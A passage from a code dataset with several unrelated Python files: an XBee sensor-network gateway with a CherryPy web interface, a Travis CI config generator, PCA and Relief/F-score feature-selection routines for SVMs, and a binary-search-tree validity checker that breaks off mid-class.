pinsparsed:\n if pname not in pinlist:\n logging.warning('Unknown pin identifier \"%s\". Ignoring.',pname)\n continue\n if ptype not in pintovalue:\n logging.error('Unknown type \"%s\" for pin \"%s\". 
Ignoring.', ptype, pname)\n                    continue\n                pinconfig.append( (pname,pintovalue[ptype]) )\n            \n            logging.debug('Pin configuration: \"%s\".', pinconfig) \n        except:\n            logging.critical('Invalid pin configuration for node type \"%s\".', nodeconfig)\n            raise\n        \n        # --- START configuration\n        logging.info('Configuring attached sensor \"%s\" to type \"%s\".', nodename, nodetype)\n        \n        # Set the parent to be the mesh master node\n        logging.debug('Setting target node.')\n        xbee.at(frame_id=h2b('08'),command=b'DL',parameter=h2b('00'))\n        xbee.at(frame_id=h2b('09'),command=b'DH',parameter=h2b('00'))\n        \n        # Set network id\n        logging.debug('Setting network id.')\n        xbee.at(frame_id=h2b('0A'),command=b'ID',parameter=h2b(networkid))\n        \n        # Set pin information\n        logging.debug('Writing pin information')\n        for pname,ptype in pinconfig:\n            command = pintocommand(pname)\n            logging.debug('Sending AT command \"%s\" parameter \"%s\"',command,ptype)\n            xbee.at(frame_id=h2b('04'),command=command,parameter=ptype)\n        \n        # Set sampling interval. It is 1 second initially to prevent long sleep - changed when bound\n        logging.debug('Setting node sampling interval.')\n        xbee.at(frame_id=h2b('05'),command=b'IR',parameter=h2b('03e8')) \n        \n        # Auto connect to the network\n        logging.debug('Setting network autoconnect.')\n        xbee.at(frame_id=h2b('06'),command=b'VJ',parameter=h2b('01'))\n        \n        # Write configuration\n        logging.debug('Writing node configuration.')\n        xbee.at(frame_id=h2b('07'),command=b'WR',parameter=h2b('00'))\n        \n        print('Configured node {0} to type {1}.'.format(nodename,nodetype))\n\nclass XBeeMessage:\n    \"\"\"\n    Message to be stored in the message queue to be sent to an xbee client\n    \"\"\"\n    def __init__(self,type,longaddress,command,parameter):\n        self.type = type\n        self.longaddress = longaddress\n        self.parameter = parameter\n        self.command = command\n\nclass MainHandler(object):\n\n    @cherrypy.expose\n    @cherrypy.tools.json_out()\n    def get(self,node='all'):\n        global lastvalues\n        \n        if node == 'all':\n            return(lastvalues)\n        elif node in lastvalues:\n            return(lastvalues[node])\n        else:\n            return({'error':'Invalid node name.'})\n        \n    @cherrypy.expose\n    @cherrypy.tools.json_out()    \n    def set(self,node='None',pin='None',value='None'):\n        global lastvalues\n        global xbeeque\n        global nametoserial\n\n        if node not in lastvalues:\n            return {'error':'Invalid node name.'}\n        if pin not in pinlist + ['d5']:\n            return {'error':'Invalid pin name.'}\n        if value not in ['0','1']:\n            return {'error':'Invalid value'}\n        \n        valraw = h2b('04') if value == '0' else h2b('05')\n        xbeeque.put(XBeeMessage('remote_at',h2b(nametoserial[node]),pintocommand(pin),valraw))\n        return {'node':nametoserial[node], 'pin':pin,'value':value}\n\ndef listen(xbee,dispatch,masterconfig,nodeconfig):\n    \"\"\"\n    Launches a service that communicates with the xbee sensors and a webserver interface\n    \"\"\"\n    logging.info('Starting the listening sequence.')\n    \n    import queue\n    global xbeeque\n    xbeeque = queue.Queue()\n    \n    # TODO: make sure that the right master node is consistent with the configuration file\n    \n    # Parse the node types\n    logging.debug('Parsing node types from the main file.')\n    try:\n        nodetypes = [nt for nt in masterconfig.keys() if nt != 'DEFAULT']\n        # maps node type to interval in string hex form\n        typetointerval = {}\n        for nt in nodetypes:\n            ni = masterconfig[nt]['sampleperiod']\n            nih = hex(int(ni))[2:]\n            if len(nih) > 4:\n                logging.error('Invalid sampling period \"%s\" and its hex representation \"%s\" -- at most 4 hex digits.',ni,nih)\n            if len(nih) < 4:\n                nih = ('000' + nih)[-4:] \n
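            # store the zero-padded 4-hex-digit sampling period that the IR command expects\n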
            typetointerval[nt] = nih\n        \n        logging.debug('Loaded node types %s.', nodetypes)\n        logging.debug('Loaded node intervals %s.', typetointerval)\n    except:\n        logging.critical('Could not parse the main configuration file (default: xbeesens.cfg).')\n        raise\n    \n    # Load node configuration\n    logging.debug('Parsing node configuration file.')\n    try:\n        if len(nodeconfig['DEFAULT']) > 0:\n            logging.warning('Node configuration file must not contain any DEFAULT entries or a sensor named \"DEFAULT\". DEFAULT sensor will be ignored.')\n        \n        nodelist = [(name,node) for name,node in nodeconfig.items() if name != 'DEFAULT'] \n        \n        for name,node in nodelist:\n            if node['type'] not in nodetypes and node['type'] != 'MASTER':\n                logging.critical('Unknown node type: \"%s\". Terminating.', node['type'])\n                raise ValueError('Unknown node type: \"%s\". Terminating.' % node['type'])\n        \n        serialtoname = {node['serial'] : name for name,node in nodelist}\n        global nametoserial\n        nametoserial = {name : node['serial'] for name,node in nodelist}\n        nametotype = {name : node['type'] for name,node in nodelist}\n        \n    except Exception as e:\n        logging.critical('Could not parse the node configuration file \"%s\".', config['DEFAULT']['nodefile'])\n        raise e\n    \n    # Load pin and formula configuration for each node\n    try:\n        # pins marked for association (if none, then there is no entry)\n        nametopins = {}\n        # formulas for the node\n        nametoformulas = {}\n        for name,nodepars in nodelist:\n            if nodepars['type'] == 'MASTER':\n                continue\n            \n            pinsparsed = list((pinname.replace('pin_',''),value) \\\n                for pinname,value in masterconfig[nametotype[name]].items() if pinname.startswith('pin_') )\n            \n            formulasparsed = list((forname.replace('formula_',''),value) \\\n                for forname,value in masterconfig[nametotype[name]].items() if forname.startswith('formula_') )\n            \n            logging.debug('Parsed pin values: %s', pinsparsed)\n            if len(pinsparsed) == 0:\n                logging.error('No pins configured for node \"%s\".', name)\n            \n            pinconfig = []\n            for pname,ptype in pinsparsed:\n                if pname not in pinlist:\n                    logging.warning('Unknown pin identifier \"%s\". Ignoring.',pname)\n                    continue\n                if ptype not in pintovalue:\n                    logging.error('Unknown type \"%s\" for pin \"%s\". Ignoring.', ptype, pname)\n                    continue\n                pinconfig.append( (pname,pintovalue[ptype]) )\n            \n            logging.debug('Node %s pin configuration: \"%s\".', name,pinconfig) \n            \n            nametopins[name] = pinconfig\n            nametoformulas[name] = formulasparsed\n            \n    except:\n        logging.critical('Invalid pin configuration for node type \"%s\".', nodeconfig)\n        raise\n    \n    # Maps serial number addresses to short ones\n    logging.debug('Initializing address map.')\n    #TODO : make sure that all the code is thread safe (add semaphores)\n    shortaddressmap = {}\n    \n    def onprocesspacket(longaddress, shortaddress,packet,nodename=None):\n        \"\"\"\n        Processes general packet handling\n        \n        Returns\n        -------\n        out : bool\n            True if successful, False if the packet should be skipped\n        \"\"\"\n        if nodename is None:\n            hexlongaddress = b2h(longaddress)\n            if hexlongaddress not in serialtoname:\n                logging.warning('Unknown node with serial number \"%s\" connected.
 Ignoring.', hexlongaddress)\n                return False\n            nodename = serialtoname[hexlongaddress]\n        \n        # First make sure that the short address is correct and registered\n        if longaddress not in shortaddressmap:\n            logging.info('Registered (%s,%s)' % (b2h(longaddress), b2h(shortaddress)))\n            shortaddressmap[longaddress] = shortaddress\n        elif shortaddressmap[longaddress] != shortaddress:\n            logging.info('Re-registered (%s,%s)' % (b2h(longaddress), b2h(shortaddress)))\n            shortaddressmap[longaddress] = shortaddress\n        else:\n            logging.debug('Correct short address in the dictionary (%s,%s)' % (b2h(longaddress), b2h(shortaddress)) )\n        \n        # reads the packet to determine whether the node is OK or needs to be updated\n        # if yes then it turns off the association light and sets the correct sampling interval\n        if 'samples' in packet and len(packet['samples']) > 0:\n            \n            # Proceed only when this is a packet with samples\n            samples = packet['samples'][0]\n            \n            if ('dio-5' not in samples) or (samples['dio-5'] is True):\n                # dio-5 missing or still high: the node has not been initialized yet\n                logging.info('Initializing node \"%s\" (updating pin information).', nodename) \n                # Turn off the indicator light\n                xbeeque.put(XBeeMessage('remote_at',longaddress,b'D5',h2b('04')),True,1)\n                # Set the correct sampling time interval\n                interval = h2b(typetointerval[nametotype[nodename]])\n                logging.debug('Setting sampling interval to %s', interval)\n                xbeeque.put(XBeeMessage('remote_at',longaddress,b'IR',interval),True,1)\n\n                # Set pin information\n                logging.debug('Writing pin information')\n                \n                for pname,ptype in nametopins[nodename]:\n                    command = pname.upper().encode(encoding='ascii', errors='strict')\n                    logging.debug('Sending AT command \"%s\" parameter \"%s\"',command,ptype)\n                    xbeeque.put(XBeeMessage('remote_at',longaddress,command,ptype))\n            \n        else:\n            logging.warning('Received a sample packet with no samples: \"%s\"', str(packet))\n\n        #logging.info('Initializing node \"%s\", short \"%s\"' % (b2h(longaddress),b2h(dest_addr)))\n        #xbee.remote_at(dest_addr_long=longaddress,dest_addr=dest_addr,frame_id=h2b('ab'),command=b'D5',parameter=h2b('04'))\n        #xbee.remote_at(dest_addr_long=longaddress,dest_addr=dest_addr,frame_id=h2b('ac'),command=b'IR',parameter=h2b('ea60'))\n        \n        return True\n\n    # Create handlers for various packet types\n    def status_handler(type, packet):\n        logging.info('Status or remote_at_response update received: %s from %s' % (b2h(packet['status']),b2h(packet['source_addr_long'])))\n        logging.debug(\"Status update received: %s\", packet)\n\n    dispatch.register(\n        \"status\", \n        status_handler, \n        lambda packet: packet['id']=='status' or packet['id']=='remote_at_response'\n    )\n    \n    dispatch.register(\n        \"other\", \n        lambda name,packet : logging.debug('Other packet received: %s', packet),\n        lambda packet: packet['id']!='status' and packet['id']!='remote_at_response' and packet['id']!='rx_io_data_long_addr'\n    )\n    \n    # TODO: Make sure that the lastvalues dictionary is synchronized\n    # maps node name to its last received value\n    global lastvalues\n    lastvalues = {name : None for name,nt in nodelist if nt['type'] != 'MASTER'}\n    \n    def io_sample_handler(type, packet):\n        \"\"\"\n        Handles a sample from a node.\n        \n        Parameters\n        ----------\n        type : string\n            Type of the packet\n        packet : object\n            An xbee packet\n        \"\"\"\n        logging.debug('Starting sample handler.')\n        longaddress = packet['source_addr_long'] \n        shortaddress = packet['source_addr']\n        \n        # convert the address to a hexadecimal\n        hexlongaddress = b2h(longaddress)\n        if hexlongaddress not in serialtoname:\n            logging.warning('Unknown node
 with serial number \"%s\" connected. Ignoring.', longaddress)\n            return\n        # name of the node\n        nodename = serialtoname[hexlongaddress]\n        \n        if not onprocesspacket(longaddress,shortaddress,packet,nodename=nodename):\n            return\n\n        samples = packet['samples']\n        if len(samples) != 1:\n            logging.error('Something is wrong with the packet. There must be exactly one entry for \"samples\". Packet: \"%s\". Ignoring.', str(packet).replace('\\n',' '))\n        samples = samples[0]\n        \n        samples['timestamp'] = time.time()\n        lastvalues[nodename] = samples\n        logging.debug('Received a new sample for node \"%s\" with \"%s\".', nodename, samples)\n        \n        # Compute formulas\n        formulas = nametoformulas[nodename]\n        if len(formulas) > 0:\n            samples_replaced = {n.replace('-','_'):v for n,v in samples.items()}\n            for formname,formvalue in formulas:\n                try:\n                    exec('y=' + formvalue,samples_replaced)\n                    if 'y' in samples_replaced:\n                        samples[formname] = samples_replaced['y']\n                    else:\n                        samples[formname] = '#N/A'\n                        logging.warning('Formula \"%s\" with value \"%s\" with packet \"%s\" did not set value to variable y.', formname, formvalue, str(packet))\n                except Exception as e:\n                    logging.error('Error computing formula \"%s\" with value \"%s\" with packet \"%s\": %s', formname, formvalue, str(packet), str(e))\n                    samples[formname] = '#ERR'\n\n            logging.debug('Updating a new sample for node \"%s\" with \"%s\" after processing formulas.', nodename, samples) \n        \n        \n    dispatch.register(\n        \"io_data\", \n        io_sample_handler,\n        lambda packet: packet['id']=='rx_io_data_long_addr'\n    )\n\n    # run the message dispatch in a separate thread\n    def message_dispatch():\n        # Dispatch messages from the xbee queue\n        logging.info('Starting message loop.')\n        global xbeeque\n        while True:\n            try:\n                message = xbeeque.get()\n                if message.type == 'remote_at':\n                    if message.longaddress in shortaddressmap:\n                        shortaddress = shortaddressmap[message.longaddress]\n                        logging.debug('Sending remote_at message \"%s\" with params \"%s\"', message.command, message.parameter)\n                        xbee.remote_at(dest_addr_long=message.longaddress,dest_addr=shortaddress,\\\n                            frame_id=h2b('ab'),command=message.command,parameter=message.parameter)\n                    else:\n                        logging.warning('Short address not found - using long address; could be inefficient. Sending remote_at message \"%s\" with params \"%s\"', message.command, message.parameter)\n                        xbee.remote_at(dest_addr_long=message.longaddress,\\\n                            frame_id=h2b('ab'),command=message.command,parameter=message.parameter)\n                else:\n                    logging.error('Message type not understood: \"%s\".', message.type)\n            except KeyboardInterrupt:\n                logging.warning('Caught keyboard interrupt. Exiting.')\n                break\n    thread = threading.Thread(target = message_dispatch)\n    thread.start()\n\n\n    # Starting web server\n    if 'port' in masterconfig['DEFAULT']:\n        portnumber = int(masterconfig['DEFAULT']['port'])\n    else:\n        logging.warning('No port number specified in the config file (DEFAULT/port), using 8888.')\n        portnumber = 8888\n    \n    logging.info('Starting web server on port %s.' % portnumber)\n    cherrypy.config.update({'server.socket_port': portnumber}) \n    cherrypy.quickstart(MainHandler())\n\nif __name__ == '__main__':\n    \n    # make an exception when running interactively in iep\n    # must manually create the args object\n    if '__iep__' not in dir():\n        parser = argparse.ArgumentParser(description='Configure xbee nodes and create an http gateway')\n        parser.add_argument('command', choices=['configure','listen'],\n                help='Command to run.
 \"configure\" will configure the connected xbee, \"listen\" will launch a daemon that monitors and saves the received messages.') \n        \n        parser.add_argument('--config',default='xbeesens.cfg', help='Configuration file.')\n        parser.add_argument('--port',default='/dev/ttyUSB0', help='Port to which to communicate')\n        parser.add_argument('--rate',default=9600,help='Communication rate', type=int)\n        parser.add_argument('-v','--verbose',action='count',help='Increase logging verbosity, use -vvv for maximal verbosity.')\n\n        args = parser.parse_args()\n    else:\n        if 'args' not in dir():\n            class X:\n                pass\n            \n            args = X()\n            args.config = 'xbeesens.cfg'\n            args.verbose = 3 \n            args.port = '/dev/ttyUSB0'\n            args.rate = 9600\n            args.command = 'listen'\n    \n    # Determine the right verbosity\n    if args.verbose == 0 or args.verbose == None:\n        level = logging.ERROR\n    elif args.verbose == 1:\n        level = logging.WARNING\n    elif args.verbose == 2:\n        level = logging.INFO\n    elif args.verbose == 3:\n        level = logging.DEBUG\n    else:\n        raise ValueError('Invalid log level: %s' % args.verbose)\n    \n    logging.basicConfig(format='%(asctime)s: %(levelname)s: %(message)s',level=level)\n    \n    logging.info('Reading main configuration file \"%s\".',args.config)\n    config = configparser.ConfigParser()\n    config.read(args.config)\n    \n    if 'networkid' not in config['DEFAULT']:\n        raise ValueError('Missing \"networkid\" in DEFAULT group of the configuration file.')\n    \n    try:\n        hexnet = h2b(config['DEFAULT']['networkid'])\n        logging.debug('Byte representation of network id \"%s\".', hexnet)\n        if len(hexnet) != 2:\n            raise ValueError('network id is not 2 bytes')\n    except:\n        logging.critical('Failed parsing networkid. It is \"%s\", but must be a 4-digit hexadecimal.', config['DEFAULT']['networkid'])\n        raise\n    \n    if 'nodefile' not in config['DEFAULT']:\n        raise ValueError('Missing \"nodefile\" in DEFAULT group of the configuration file.')\n    nodefilename = config['DEFAULT']['nodefile'] \n    \n    logging.info('Reading nodes configuration \"%s\"', nodefilename)\n    nodeconfig = configparser.ConfigParser()\n    try:\n        nodeconfig.read(nodefilename)\n    except:\n        logging.critical('Could not read the node configuration file \"%s\".', nodefilename)\n        raise\n    \n    # Open serial port\n    with serial.Serial(args.port,args.rate) as ser:\n        # Create an xbee ZigBee communication object\n        dispatch = Dispatch(ser)\n        logging.debug('Creating xbee object.')\n        xbee = ZigBee(ser,callback=dispatch.dispatch)\n\n        try:\n            if args.command == 'listen':\n                listen(xbee,dispatch,config,nodeconfig)\n            elif args.command == 'configure':\n                config_client(xbee,dispatch,config,nodeconfig)\n            else:\n                logging.critical('Unknown command \"%s\", terminating.',args.command)\n        finally:\n            # halt() must be called before closing the serial port in order to ensure proper thread shutdown\n            logging.info('Halting xbee.')\n            xbee.halt()\n            ser.close()\n            logging.info('Closed serial port.')\n\n    #with open('example.cfg', 'w') as configfile:\n    #    config.write(configfile)\n","repo_name":"marekpetrik/xbeesens","sub_path":"xbeesens.py","file_name":"xbeesens.py","file_ext":"py","file_size_in_byte":25254,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"34067482786","text":"from tox._config import parseconfig\n\nTOX_ENVS = list()\nfor env in parseconfig(None, 'tox').envlist:\n    TOX_ENVS.append(\" - TOX_ENV={0}\".format(env))\n\nTEMPLATE = '''\nlanguage: python\npython: 2.7\nenv:\n{0}\ninstall:\n - pip install tox\nscript:\n - tox -e
 $TOX_ENV\n'''\n\nprint(TEMPLATE.format('\\n'.join(TOX_ENVS)))\n","repo_name":"ipfs-shipyard/py-ipfs","sub_path":"travis.py","file_name":"travis.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":476,"dataset":"github-code","pt":"72"} +{"seq_id":"74326607592","text":"# import packages\r\nimport os\r\nimport numpy as np\r\nimport pandas as pd\r\nnow_path = os.getcwd()\r\nfile_path = os.path.dirname(__file__)\r\nimport sys\r\nsys.path.append(file_path)\r\nimport Load as iload\r\nimport Visual as ivis\r\nimport SVM as isvm\r\nimport Evaluate as ieval\r\nimport Plot as iplot\r\nimport math\r\nimport random\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.preprocessing import MinMaxScaler\r\n\r\n\r\n# PCA #########################################################################\r\n# feature combination test\r\ndef select_test(data, label, feature, c_number, gamma, crossv, now_path):\r\n    \r\n    fs_acc = []\r\n    filter_data = []\r\n    for k in label:\r\n        filter_data.append(str(k))\r\n    start_e = 0\r\n    for i in range(len(feature)):\r\n        start_e += 1\r\n        key = feature[i]\r\n        for j in range(len(data)):\r\n            filter_data[j] += ' ' + str(i + 1) + ':' + str(data[j,key])\r\n        out_content = ''\r\n        for n in filter_data:\r\n            out_content += n + '\\n'\r\n        with open('mid-ifs', 'w') as ot:\r\n            ot.write(out_content)\r\n        test_label, predict_label = isvm.svm_evaluate(os.path.join(now_path, 'mid-ifs'),\r\n                                                      float(c_number), float(gamma), int(crossv))\r\n        standard_num = ieval.evaluate_score(test_label, predict_label)\r\n        single_acc = round(standard_num[4], 3)\r\n        fs_acc.append(single_acc)\r\n        os.remove('./mid-ifs')\r\n        ivis.visual_easy_time(start_e, len(feature))\r\n    return fs_acc\r\n\r\n\r\ndef pca_scale(x_train):\r\n    min_max_scaler = MinMaxScaler(feature_range=(-1, 1))\r\n    scaler = min_max_scaler.fit(x_train)\r\n    x_train_ = scaler.transform(x_train)\r\n    return x_train_\r\n\r\n\r\n# pca\r\ndef select_pca(data):\r\n    x = data.iloc[:, :]\r\n    x_s = pca_scale(x)\r\n    pca = PCA(n_components=1)\r\n    pca.fit(x_s)\r\n    pc1_loadings = pca.components_.T * np.sqrt(pca.explained_variance_)\r\n    pc1_featurescore = pd.DataFrame({'Feature': x.columns,\r\n                                     'PC1_loading': pc1_loadings.T[0],\r\n                                     'PC1_loading_abs': abs(pc1_loadings.T[0])})\r\n    pc1_featurescore = pc1_featurescore.sort_values('PC1_loading_abs', ascending=False)\r\n    feature_selection = []\r\n    for i in pc1_featurescore['Feature']:\r\n        feature_selection.append(i)\r\n    return feature_selection\r\n\r\n\r\n# save\r\ndef select_save(out, fs_sort):\r\n    out_file = 'IFS-feature-sort: '\r\n    for j in fs_sort:\r\n        out_file += str(j + 1) + ' '\r\n    with open(out, 'w', encoding='UTF-8') as f:\r\n        f.write(out_file)\r\n        f.close()\r\n\r\n\r\n# select pca main for svm\r\ndef select_svm_pca(in_path, c=8, g=0.125, cv=5, out_path=now_path, all_p=True):\r\n    if out_path != None:\r\n        if os.path.split(out_path)[1] not in os.listdir(os.path.split(out_path)[0]):\r\n            os.makedirs(out_path)\r\n        # load svm\r\n        np_data, np_label = iload.load_svmfile(in_path)\r\n        # PCA\r\n        pd_data = pd.DataFrame(np_data)\r\n        fs_sort = select_pca(pd_data)\r\n        # get filter sort result\r\n        fs_acc = select_test(np_data, np_label, fs_sort, c, g, cv, now_path)\r\n        print('\\nFeature selection finished, exporting results...')\r\n        # plot\r\n        if all_p == True:\r\n            iplot.plot_select(fs_sort, fs_acc, os.path.join(out_path, 'Fsort-pca.png'), in_path=in_path)\r\n        else:\r\n            iplot.plot_select(fs_sort, fs_acc, os.path.join(out_path, 'Fsort-pca.png'))\r\n        # save results\r\n        select_save(os.path.join(out_path, 'Fsort-pca.txt'), fs_sort)\r\n
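        # index of the highest accuracy; the best subset keeps the top (index + 1) ranked features\r\n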
        return fs_acc.index(max(fs_acc))\r\n    else:\r\n        # load the input file\r\n        np_data, np_label = iload.load_svmfile(in_path)\r\n        # PCA\r\n        pd_data = pd.DataFrame(np_data)\r\n        fs_sort= select_pca(pd_data)\r\n        # get filter sort result\r\n        fs_acc = select_test(np_data, np_label, fs_sort, c, g, cv, now_path)\r\n        return fs_sort, fs_acc\r\n\r\n# select pca main for numpy\r\ndef select_np_pca(np_data, np_label, c=8, g=0.125, cv=5, out_path=now_path, in_path=None):\r\n    if out_path != None:\r\n        if os.path.split(out_path)[1] not in os.listdir(os.path.split(out_path)[0]):\r\n            os.makedirs(out_path)\r\n        # PCA\r\n        pd_data = pd.DataFrame(np_data)\r\n        fs_sort= select_pca(pd_data)\r\n        # get filter sort result\r\n        fs_acc = select_test(np_data, np_label, fs_sort, c, g, cv, now_path)\r\n        print('\\nFeature selection finished, exporting results...')\r\n        # plot\r\n        if in_path != None:\r\n            iplot.plot_select(fs_sort, fs_acc, os.path.join(out_path, 'Fsort-pca.png'), in_path=in_path)\r\n        else:\r\n            iplot.plot_select(fs_sort, fs_acc, os.path.join(out_path, 'Fsort-pca.png'))\r\n        select_save(os.path.join(out_path, 'Fsort-pca.txt'), fs_sort)\r\n        return fs_acc.index(max(fs_acc))\r\n    else:\r\n        # PCA\r\n        pd_data = pd.DataFrame(np_data)\r\n        fs_sort= select_pca(pd_data)\r\n        # get filter sort result\r\n        fs_acc = select_test(np_data, np_label, fs_sort, c, g, cv, now_path)\r\n        return fs_sort, fs_acc\r\n\r\n\r\n# RF ##########################################################################\r\n\r\n# sort\r\ndef select_sort_rf(data):\r\n    arr = []\r\n    for i in data:\r\n        arr.append(i)\r\n    index = []\r\n    for i in range(len(arr)):\r\n        index.append(i)\r\n    for i in range(len(arr) - 1):\r\n        min_index = i\r\n        for j in range(i + 1, len(arr)):\r\n            if arr[j] < arr[min_index]:\r\n                min_index = j\r\n        index[min_index], index[i] = index[i], index[min_index]\r\n        arr[min_index], arr[i] = arr[i], arr[min_index]\r\n    # output indices in reverse (descending) order\r\n    re_index = []\r\n    for i in range(len(index) - 1, -1, -1):\r\n        re_index.append(index[i])\r\n    return re_index\r\n\r\n\r\n# ojld (Euclidean) distance\r\ndef ojld_distance(p_data, n_data, test_data, number):\r\n    p_distance = []\r\n    n_distance = []\r\n    for line in p_data:\r\n        p_distance.append(math.pow((test_data[number] - line[number]), 2))\r\n    for line in n_data:\r\n        n_distance.append(math.pow((test_data[number] - line[number]), 2))\r\n    return [min(p_distance), min(n_distance)]\r\n\r\n\r\n# relief method\r\ndef select_relief(number, feature_class, feature_line, cycle):\r\n    feature_standard = list(feature_line)\r\n    p_data = []\r\n    n_data = []\r\n    for i in range(len(feature_standard)):\r\n        if feature_class[i] == 0:\r\n            p_data.append(feature_standard[i])\r\n        if feature_class[i] == 1:\r\n            n_data.append(feature_standard[i])\r\n    weight = 0\r\n    m = 0\r\n    for m in range(cycle):\r\n        rand_num = random.randint(0, len(feature_standard) - 1)\r\n        if feature_class[rand_num] == 0:\r\n            distance_box = ojld_distance(p_data, n_data, feature_standard[rand_num], number)\r\n            weight += -distance_box[0] + distance_box[1]\r\n        if feature_class[rand_num] == 1:\r\n            distance_box = ojld_distance(p_data, n_data, feature_standard[rand_num], number)\r\n            weight += -distance_box[1] + distance_box[0]\r\n    aver_weight = weight / (m + 1)\r\n    aver_weight = 1 / (1 + math.exp(-aver_weight))\r\n    return aver_weight\r\n\r\n\r\n# fscore method\r\ndef select_fscore(number, feature_class, feature_line):\r\n    type_both = 0\r\n    type_a = 0\r\n    type_b = 0\r\n    t0 = 0\r\n    t1 = 0\r\n    for i in range(len(feature_class)):\r\n        if feature_class[i] == 0:\r\n            type_a += feature_line[i, number]\r\n            t0 += 1\r\n        else:\r\n            type_b += feature_line[i, number]\r\n
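            # accumulate the class-1 sum and count for the per-class means used by the F-score\r\n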
            t1 += 1\r\n        type_both += feature_line[i, number]\r\n    avg_0 = type_a / t0\r\n    avg_1 = type_b / t1\r\n    avg_both = type_both / len(feature_class)\r\n    f_son = math.pow(avg_0 - avg_both, 2) + math.pow(avg_1 - avg_both, 2)\r\n    avg_m_0 = 0\r\n    avg_m_1 = 0\r\n    for i in range(len(feature_class)):\r\n        if feature_class[i] == 0:\r\n            avg_m_0 += (math.pow(feature_line[i, number] - avg_0, 2))\r\n        else:\r\n            avg_m_1 += (math.pow(feature_line[i, number] - avg_1, 2))\r\n    f_mother = avg_m_0 / (t0 - 1) + avg_m_1 / (t1 - 1)\r\n    if f_mother != 0:\r\n        f_score = f_son / f_mother\r\n    else:\r\n        f_score = -0.1\r\n    return f_score\r\n\r\n\r\n# select features\r\ndef select_rf(np_data, np_label, cycle):\r\n    relief_list = []\r\n    start_num = 0\r\n    for each_number in range(len(np_data[0])):\r\n        start_num += 1\r\n        ivis.visual_easy_time(start_num, len(np_data[0]))\r\n        type_relief = select_relief(each_number, np_label, np_data, cycle)  # compute the relief weight of each feature\r\n        type_fscore = select_fscore(each_number, np_label, np_data)  # compute the F-score of each feature\r\n        complex_num = 1 / (math.exp(-type_relief) + 1) + 1 / (math.exp(-type_fscore) + 1)\r\n        relief_list.append(complex_num)\r\n    relief_pool = select_sort_rf(relief_list)  # sort by weight\r\n    return relief_pool, relief_list\r\n\r\n\r\n# select rf main for svm\r\ndef select_svm_rf(in_path, c=8, g=0.125, cv=5, cycle=50, out_path=now_path, all_p=True, raaBook='minCODE'):\r\n    if out_path != None:\r\n        if os.path.split(out_path)[1] not in os.listdir(os.path.split(out_path)[0]):\r\n            os.makedirs(out_path)\r\n        # load svm\r\n        np_data, np_label = iload.load_svmfile(in_path)\r\n        # rf\r\n        fs_sort, fs_weight = select_rf(np_data, np_label, cycle)\r\n        # get filter sort result\r\n        fs_acc = select_test(np_data, np_label, fs_sort, c, g, cv, now_path)\r\n        # plot\r\n        if all_p == True:\r\n            iplot.plot_select(fs_sort, fs_acc, os.path.join(out_path, 'Fsort-rf.png'), in_path=in_path)\r\n            # plot 2\r\n            iplot.plot_feature_analize(fs_sort, fs_acc, fs_weight, os.path.join(out_path, 'Pie-rf.html'), in_path, raaBook=raaBook)\r\n        else:\r\n            iplot.plot_select(fs_sort, fs_acc, os.path.join(out_path, 'Fsort-rf.png'))\r\n        select_save(os.path.join(out_path, 'Fsort-rf.txt'), fs_sort)\r\n        return fs_acc.index(max(fs_acc))\r\n    else:\r\n        # load svm\r\n        np_data, np_label = iload.load_svmfile(in_path)\r\n        # rf\r\n        fs_sort, fs_weight = select_rf(np_data, np_label, cycle)\r\n        # get filter sort result\r\n        fs_acc = select_test(np_data, np_label, fs_sort, c, g, cv, now_path)\r\n        return fs_sort, fs_acc\r\n\r\n\r\n# select rf main for numpy\r\ndef select_np_rf(np_data, np_label, c=8, g=0.125, cv=5, cycle=50, out_path=now_path, in_path=None, raaBook='minCODE'):\r\n    if out_path != None:\r\n        if os.path.split(out_path)[1] not in os.listdir(os.path.split(out_path)[0]):\r\n            os.makedirs(out_path)\r\n        # rf\r\n        fs_sort, fs_weight = select_rf(np_data, np_label, cycle)\r\n        # get filter sort result\r\n        fs_acc = select_test(np_data, np_label, fs_sort, c, g, cv, now_path)\r\n        # plot\r\n        if in_path != None:\r\n            iplot.plot_select(fs_sort, fs_acc, os.path.join(out_path, 'Fsort-rf.png'), in_path=in_path)\r\n            # plot 2\r\n            iplot.plot_feature_analize(fs_sort, fs_acc, fs_weight, os.path.join(out_path, 'Pie-rf.html'), in_path, raaBook=raaBook)\r\n        else:\r\n            iplot.plot_select(fs_sort, fs_acc, os.path.join(out_path, 'Fsort-rf.png'))\r\n        select_save(os.path.join(out_path, 'Fsort-rf.txt'), fs_sort)\r\n        return fs_acc.index(max(fs_acc))\r\n    else:\r\n        # rf\r\n        fs_sort, fs_weight = select_rf(np_data, np_label, cycle)\r\n        # get filter sort result\r\n        fs_acc = select_test(np_data, np_label, fs_sort, c,
 g, cv, now_path)\r\n        return fs_sort, fs_acc\r\n","repo_name":"KingoftheNight/IRAP","sub_path":"irap/Select.py","file_name":"Select.py","file_ext":"py","file_size_in_byte":11436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10781040484","text":"import sys\n\nclass Solution:\n    def isValidBSTRecursive(self, node: 'TreeNode', min, max): # Recursive Approach\n        if not node:\n            return True\n        if min >= node.val or max <= node.val:\n            return False\n\n        return self.isValidBSTRecursive(node.left, min, node.val) and self.isValidBSTRecursive(node.right, node.val, max)\n\n    def isValidBSTBFS(self, root): # Iterative Approach\n        max = sys.maxsize\n        min = -sys.maxsize - 1\n        queue = [AugmentedTreeNode(root, min, max)]\n        while queue:\n            augmented_node = queue.pop(0)\n            if augmented_node.node:\n                node_value = augmented_node.node.val\n                if node_value <= augmented_node.min or node_value >= augmented_node.max:\n                    return False\n\n                queue.append(AugmentedTreeNode(augmented_node.node.left, augmented_node.min, node_value))\n                queue.append(AugmentedTreeNode(augmented_node.node.right, node_value, augmented_node.max))\n        return True\n\n# Ques. Why BFS why not DFS.\n# Ans. BFS will be able to catch the error faster --> Asymptotically faster\n\n    def isValidBST(self, root: 'TreeNode'):\n        # Recursive Approach\n        # max = sys.maxsize\n        # min = -sys.maxsize - 1\n        # return self.isValidBSTRecursive(root, min, max)\n\n        # Iterative Approach\n        return self.isValidBSTBFS(root)\n\nclass AugmentedTreeNode:\n    def __init__(self, node, min, max):\n        self.node = node\n        self.min = min\n        self.max = max\n\nclass TreeNode:\n    def __init__(self, val):\n        self.val = val\n        self.left = None # Points to another TreeNode 